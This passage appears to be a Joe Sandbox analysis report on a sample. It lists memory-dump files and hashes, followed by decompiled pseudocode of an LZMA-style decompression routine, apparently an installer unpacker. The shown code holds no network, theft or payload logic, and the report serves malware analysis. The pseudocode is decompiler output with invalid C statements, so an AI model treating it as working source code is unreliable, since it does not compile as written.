Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406682, Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406682() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
